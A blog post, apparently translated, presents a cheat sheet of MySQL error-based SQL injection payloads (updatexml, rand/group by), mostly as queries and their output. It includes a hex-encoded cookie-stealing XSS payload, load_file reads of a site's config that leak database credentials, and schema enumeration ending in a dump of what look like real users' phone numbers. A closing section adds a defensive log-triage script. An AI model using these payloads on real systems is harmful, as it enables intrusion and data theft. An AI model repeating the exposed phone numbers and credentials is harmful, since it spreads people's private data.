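MySQL error 1305: "error"-based injection in MySQL

How does an error turn into XSS?

A MySQL statement raises an error that is shown on the page, leaking information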

=========================================================================================================================================================================

*Error method "updatexml": has a length limit, but does not need to be combined with union.

mysql> select updatexml(1, concat(':', 'test'), 1);

ERROR 1105 (HY000): XPATH syntax error: ':test'

mysql> select updatexml(1, concat(0x3a, 'test'), 1);

ERROR 1105 (HY000): XPATH syntax error: ':test'

mysql> select updatexml(1, concat(0x5e, 'test'), 1);

ERROR 1105 (HY000): XPATH syntax error: '^test'

mysql> select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);

ERROR 1105 (HY000): XPATH syntax error: '^test'

**The 'test' above can be replaced with any subquery or function.

*group by + rand(0) + having: no length limit, and no need to combine with union.

mysql> select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);

ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*Error method "rand+count+group by": needs to be combined with union

rand(0) generates the same sequence no matter which machine it runs on or how many times it is run

See the bug disclosed in the MySQL developer community: http://bugs.mysql.com/bug.php?id=8652

mysql> select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'

mysql> select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'

**The 'test' above can be replaced with any subquery or function.

MySQL-to-XSS statement

mysql> select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry '/>fuck^0.7' for key 'group_key'

Dump the password from the configuration file directly; this requires the FILE privilege

mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);

ERROR 1105 (HY000): XPATH syntax error: ':'DB_NAME' => 'fan******un','

mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);

ERROR 1105 (HY000): XPATH syntax error: ':'DB_USER' => 's*********b', /'

mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);

ERROR 1105 (HY000): XPATH syntax error: ':PWD' => 'hahahaahhah','

Dump the version

mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;

ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

Dump the database name

mysql> select info();

ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist

mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

Dump the table names

mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'

mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'

mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'

mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'

mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

Dump the column names

mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'

mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

Dump the column values

mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'

mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'
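
Added example, not part of the original post: a detection-side triage of logged SQL statements for the error-based constructs shown above (updatexml, floor(rand(0)*2) with group by, load_file, information_schema enumeration), which also decodes 0x... literals so an analyst can see what a statement hides. The signature names, function names and the sample log lines are constructed for illustration.

```python
import re

# Signatures for the error-based constructs shown on this page (names are hypothetical).
SIGNATURES = {
    "updatexml-xpath-error": re.compile(r"updatexml\s*\(", re.I),
    "rand-group-by-duplicate": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by"
        r"|group\s+by.*floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)",
        re.I | re.S),
    "load_file-read": re.compile(r"load_file\s*\(", re.I),
    "schema-enumeration": re.compile(r"information_schema\.(tables|columns)", re.I),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)", re.I)

def decode_hex_literals(query):
    """Return printable decodings of the 0x... literals in a statement."""
    decoded = []
    for match in HEX_LITERAL.finditer(query):
        text = bytes.fromhex(match.group(1)).decode("utf-8", "replace")
        if text.isprintable():
            decoded.append(text)
    return decoded

def classify(query):
    """Name every signature that matches and expose hex-encoded strings."""
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
    return {"hits": hits, "decoded": decode_hex_literals(query)}

def triage(log_lines):
    """Keep only the statements that match at least one signature."""
    return [(line, r) for line in log_lines if (r := classify(line))["hits"]]

# Constructed query-log lines; the file path is a made-up placeholder.
SAMPLE_LOG = [
    "SELECT * FROM f_user WHERE id=42",
    "SELECT * FROM f_user WHERE id=1 or 1=updatexml(1,concat(0x5e,version()),1)",
    "SELECT 1,2,count(*),concat(database(),char(0x5e),floor(rand(0)*2))x "
    "FROM information_schema.tables GROUP BY x",
    "SELECT updatexml(1,concat(char(58),substr(load_file(0x%s),150,40)),1)"
    % "/var/www/app/conf/db.php".encode().hex(),
]

if __name__ == "__main__":
    for line, result in triage(SAMPLE_LOG):
        print(result["hits"], result["decoded"], "<-", line[:60])
```

The same signatures can be run against HTTP request parameters; a hit on application traffic is also a cue to check that database error text is not being returned to the browser.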

Original: http://www.cnblogs.com/aware-why/p/5844915.html
